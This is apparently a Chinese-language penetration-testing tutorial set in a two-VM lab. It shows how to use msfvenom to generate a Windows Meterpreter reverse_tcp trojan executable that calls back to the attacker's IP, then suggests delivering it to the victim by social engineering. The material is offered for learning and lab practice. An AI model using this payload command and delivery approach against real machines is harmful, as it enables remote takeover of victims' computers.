網絡安全工程師演示：原來黑客是這樣控制你的計算機的！（上）

課前聲明：
1、本分享僅做學習交流，請自覺遵守法律法規！
2、搜索：Kali 與編程，學習更多網絡攻防乾貨！
3、Kali 與編程每天準時更新，敬請學習和關注！
正文部分
一、背景介紹
Metasploit就是一個漏洞框架。它的全稱叫做The Metasploit Framework，簡稱叫做MSF。Metasploit作爲全球最受歡迎的工具，不僅僅是因爲它的方便性和強大性，更重要的是它的框架。它允許使用者開發自己的漏洞腳本，從而進行測試。Metasploit(msf)究竟威力如何呢？如何利用木馬控制受害者主機呢？接下來讓我們一起學習！
二、資源裝備
1.安裝好 Win7的虛擬機一臺
2.整裝待發的小白一個。
3.安裝好的Kali Linux虛擬機一臺。
三、戰略安排
3.1 將受害者主機（Windows7）跟攻擊者主機（Kali Linux）的網絡模式全部設置爲NAT模式，如下圖所示。
步驟：打開虛擬機的設置/選擇網絡適配器/選擇NAT模式。

3.2 利用攻擊者主機（kali linux）的相關工具（msfvenom）生成對應的木馬文件，如下圖所示。
步驟1：msfvenom工具的參數介紹
-p, –payload < payload> 指定需要使用的payload(攻擊荷載)。也可以使用自定義payload,幾乎是支持全平臺的
-o, –out < path> 指定創建好的payload的存放位置。
-h, –help 查看幫助選項。

步驟2：msfvenom工具生成對應的木馬文件舉例，如下圖所示。

步驟3：查看攻擊者主機的主機IP地址，如下圖所示。
命令：ifconfig

步驟4：利用msfvenom工具生成對應的木馬文件，如下圖所示。
命令：msfvenom -p 指定需要使用的payload(攻擊荷載) lhost=攻擊者主機IP -f exe -o 生成木馬文件的保存位置
例子：msfVenom -p windows/meterpreter/reverse_tcp lhost=192.168.78.144 -f exe -o /root/hk.exe

步驟5：msfvenom工具生成木馬文件對應的命令運行結果如下圖所示。
Saved as:生成的木馬文件保存路徑。

步驟6：在已知的木馬文件保存路徑目錄下查找對應的木馬文件是否已經生成，如下圖所示，木馬文件已經存在（這裏使用圖形化文件管理系統來查看，你也可以利用ls命令查看對應路徑下面是否已經生成對應的木馬文件）。

3.3 利用一定的社會工程學方法將生成的木馬文件發送到目標受害者主機，並且在受害者主機進行運行（對應的社會工程學知識請持續關注本號，後續講解）

小編一個個字敲打創作，可辛苦了，問君可否關注一下我呢？你還可搜索:Kali與編程，學習更多黑客滲透技巧呢 ！拒絕盜版，轉載請聲明來源：Kali與編程
點我學習更多Kali Linux滲透測試與網絡攻防實戰技巧！